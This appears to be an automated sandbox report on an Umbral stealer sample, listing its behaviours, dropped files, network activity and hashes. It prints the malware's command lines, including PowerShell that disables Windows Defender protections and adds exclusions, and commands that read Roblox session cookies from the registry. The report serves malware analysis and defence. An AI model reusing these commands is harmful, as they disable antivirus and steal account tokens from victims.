Analysis Overview
SHA256
52770ec8f2e84b3e264870a7533286670e61bff2c8932f0cd6cc1f60af3323ae
Threat Level: Known bad
The file ConsoleApplication1.obf.exe was found to be: Known bad.
Malicious Activity Summary
Detect Umbral payload
Umbral family
Umbral
Drops file in Drivers directory
Reads user/profile data of web browsers
Executes dropped EXE
Looks up external IP address via web service
Drops file in System32 directory
Unsigned PE
Views/modifies file attributes
Suspicious use of WriteProcessMemory
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2023-11-05 03:19
Signatures
Detect Umbral payload
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | N/A | N/A |
Umbral family
Unsigned PE
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2023-11-05 03:19
Reported
2023-11-05 03:19
Platform
win10v2004-20231023-en
Max time kernel
7s
Max time network
19s
Command Line
Signatures
Detect Umbral payload
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Umbral
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Windows\System32\Speech\PFjCYKvY6iOmt1PXsCUkvtRGoBX7DypU.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\System32\Speech\aJWTG7XmdTpodQAaYnZxLv6pA5Dqot49.exe | N/A |
| N/A | N/A | C:\Windows\System32\Speech\PFjCYKvY6iOmt1PXsCUkvtRGoBX7DypU.exe | N/A |
Reads user/profile data of web browsers
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | ip-api.com | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| File created | C:\Windows\System32\Speech\aJWTG7XmdTpodQAaYnZxLv6pA5Dqot49.exe | C:\Users\Admin\AppData\Local\Temp\ConsoleApplication1.obf.exe | N/A |
| File created | C:\Windows\System32\Speech\PFjCYKvY6iOmt1PXsCUkvtRGoBX7DypU.exe | C:\Users\Admin\AppData\Local\Temp\ConsoleApplication1.obf.exe | N/A |
| File opened for modification | C:\Windows\System32\Speech\PFjCYKvY6iOmt1PXsCUkvtRGoBX7DypU.exe | C:\Windows\SYSTEM32\attrib.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Speech\PFjCYKvY6iOmt1PXsCUkvtRGoBX7DypU.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Views/modifies file attributes
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\SYSTEM32\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\ConsoleApplication1.obf.exe
"C:\Users\Admin\AppData\Local\Temp\ConsoleApplication1.obf.exe"
C:\Windows\System32\Speech\aJWTG7XmdTpodQAaYnZxLv6pA5Dqot49.exe
C:\Windows\System32\Speech\aJWTG7XmdTpodQAaYnZxLv6pA5Dqot49.exe
C:\Windows\System32\Speech\PFjCYKvY6iOmt1PXsCUkvtRGoBX7DypU.exe
C:\Windows\System32\Speech\PFjCYKvY6iOmt1PXsCUkvtRGoBX7DypU.exe
C:\Windows\SYSTEM32\attrib.exe
"attrib.exe" +h +s "C:\Windows\System32\Speech\PFjCYKvY6iOmt1PXsCUkvtRGoBX7DypU.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Windows\System32\Speech\PFjCYKvY6iOmt1PXsCUkvtRGoBX7DypU.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" os get Caption
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" computersystem get totalphysicalmemory
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
Network
| Country | Destination | Domain | Proto |
| --- | --- | --- | --- |
| US | 8.8.8.8:53 | 140.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 163.252.72.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 208.194.73.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gstatic.com | udp |
| NL | 142.250.179.131:443 | gstatic.com | tcp |
| US | 8.8.8.8:53 | 131.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 39.142.81.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 146.78.124.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
Files
C:\Windows\System32\Speech\aJWTG7XmdTpodQAaYnZxLv6pA5Dqot49.exe
| Hash | Value |
| --- | --- |
| MD5 | cebf7458dceffcbb81a290cf045beb27 |
| SHA1 | 98c74fa610995d61d2ee78a2ea888e003e9f436d |
| SHA256 | 97d22321ba783bf6d2119320d38d776bbc6bef42fe3dadecf512e23bbdd29660 |
| SHA512 | 144f0da1e8060e08340f1b349f7bbb17be298ee3d27d056d5603143125b8a9d7abb9485d0f5a2a26e2e50f0d5970ecf5fc3a9e665eece70414c6dc1504b04a91 |
C:\Windows\System32\Speech\PFjCYKvY6iOmt1PXsCUkvtRGoBX7DypU.exe
| Hash | Value |
| --- | --- |
| MD5 | ef2711e9aeeb23297016ef32b46a3c7e |
| SHA1 | ba51f478c1118d7803620367cb97ce2ceba52a5a |
| SHA256 | 2fe65b8585389b60e44f688f755bbaefe5a3689737050a96c7586bd9b69a9759 |
| SHA512 | 3c5453a308f0f8321141c2949540f7c3a7c9774eb9e8767210ee30e9745caee0e8bafa8806736f1ec04bd952aa411a5a38a6c97fe19bea3d8d86729571a7059f |
memory/1232-9-0x000001CAB1DD0000-0x000001CAB1E10000-memory.dmp
memory/1232-10-0x00007FFC8FB10000-0x00007FFC905D1000-memory.dmp
memory/1232-11-0x000001CACC390000-0x000001CACC3A0000-memory.dmp
memory/2328-12-0x00007FFC8FB10000-0x00007FFC905D1000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2ys2lioz.dti.ps1
| Hash | Value |
| --- | --- |
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2328-23-0x0000018BE5A90000-0x0000018BE5AA0000-memory.dmp
memory/2328-22-0x0000018BE5A10000-0x0000018BE5A32000-memory.dmp
memory/2328-24-0x0000018BE5A90000-0x0000018BE5AA0000-memory.dmp
memory/2328-25-0x0000018BE5A90000-0x0000018BE5AA0000-memory.dmp
memory/2328-26-0x0000018BE5A90000-0x0000018BE5AA0000-memory.dmp
memory/2328-29-0x00007FFC8FB10000-0x00007FFC905D1000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| Hash | Value |
| --- | --- |
| MD5 | d85ba6ff808d9e5444a4b369f5bc2730 |
| SHA1 | 31aa9d96590fff6981b315e0b391b575e4c0804a |
| SHA256 | 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f |
| SHA512 | 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249 |
memory/4192-31-0x00007FFC8FB10000-0x00007FFC905D1000-memory.dmp
memory/4192-41-0x000001CA484F0000-0x000001CA48500000-memory.dmp
memory/4192-42-0x000001CA484F0000-0x000001CA48500000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| Hash | Value |
| --- | --- |
| MD5 | 2e907f77659a6601fcc408274894da2e |
| SHA1 | 9f5b72abef1cd7145bf37547cdb1b9254b4efe9d |
| SHA256 | 385da35673330e21ac02545220552fe301fe54dedefbdafc097ac4342a295233 |
| SHA512 | 34fa0fff24f6550f55f828541aaefe5d75c86f8f0842d54b50065e9746f9662bb7209c74c9a9571540b9855bb3851f01db613190024e89b198d485bb5dc07721 |
memory/4192-44-0x000001CA484F0000-0x000001CA48500000-memory.dmp
memory/1232-45-0x00007FFC8FB10000-0x00007FFC905D1000-memory.dmp
memory/4192-47-0x00007FFC8FB10000-0x00007FFC905D1000-memory.dmp
memory/1232-50-0x000001CACC560000-0x000001CACC5D6000-memory.dmp
memory/1232-51-0x000001CACC4E0000-0x000001CACC530000-memory.dmp
memory/1232-52-0x000001CACC620000-0x000001CACC63E000-memory.dmp
memory/1232-53-0x000001CACC390000-0x000001CACC3A0000-memory.dmp
memory/2840-54-0x00007FFC8FB10000-0x00007FFC905D1000-memory.dmp
memory/2840-55-0x000001FE8A010000-0x000001FE8A020000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| Hash | Value |
| --- | --- |
| MD5 | a4d919c0b86abb8726889c70aa684ce6 |
| SHA1 | 0c3d34a077526faea0c816b083d6b1594839aac8 |
| SHA256 | b40885d7d80c8b07f2b227cca9848c856257713d908f303390eb3c5b2ee4241a |
| SHA512 | 9af2bab67d210df0e710141123b4dc6e0613e5becdc2e58264d3f81ccad195d4b3f963f6dca71ebda40f26a0d57b9c730183d6b470fac677c8199890417423b9 |
memory/2840-77-0x000001FE8A010000-0x000001FE8A020000-memory.dmp
memory/2840-80-0x00007FFC8FB10000-0x00007FFC905D1000-memory.dmp
memory/2372-90-0x00007FFC8FB10000-0x00007FFC905D1000-memory.dmp
memory/2372-91-0x000002226B020000-0x000002226B030000-memory.dmp
memory/2372-92-0x000002226B020000-0x000002226B030000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| Hash | Value |
| --- | --- |
| MD5 | b0a78e60bfb279d18fd3d6e7a67411f5 |
| SHA1 | 9344fe3654a14bc66afb9dc6ea215fabfbe5c906 |
| SHA256 | a28890c82033d3deaf5770ecd1b0239c77321acc93704b1d4b1e167b91e30aeb |
| SHA512 | 9548be23bec645cd705482f78d43b63659e38cf879c34f7071f42fd86ee02039379a5e92fbe0f1c74c12aaebabdd8002f57eba111d3e855cbd0c89a110e346f2 |
memory/2372-94-0x000002226B020000-0x000002226B030000-memory.dmp
memory/2372-96-0x00007FFC8FB10000-0x00007FFC905D1000-memory.dmp
memory/1232-98-0x000001CAB3B80000-0x000001CAB3B8A000-memory.dmp
memory/1232-99-0x000001CACC530000-0x000001CACC542000-memory.dmp
memory/2660-102-0x00007FFC8FB10000-0x00007FFC905D1000-memory.dmp
memory/2660-104-0x000002B86AA00000-0x000002B86AA10000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| Hash | Value |
| --- | --- |
| MD5 | b3ae619d7b2e604c5cda175980a9e909 |
| SHA1 | 7fc9e9750d42637f9a663a4e143ccf8666249d02 |
| SHA256 | 64ea1d41f18f3e3a3bef881901858bd8fed54f52d801521f9a3686073683b500 |
| SHA512 | bc72d169b668e759168b08e753591e81bf8fd08a41b7b14522bbc071ebc16548af231ad4a49385df31c690fa456a7b27c1f3554a80acc0a99e877c6717b377e0 |
memory/2660-103-0x000002B86AA00000-0x000002B86AA10000-memory.dmp
memory/2660-115-0x000002B86AA00000-0x000002B86AA10000-memory.dmp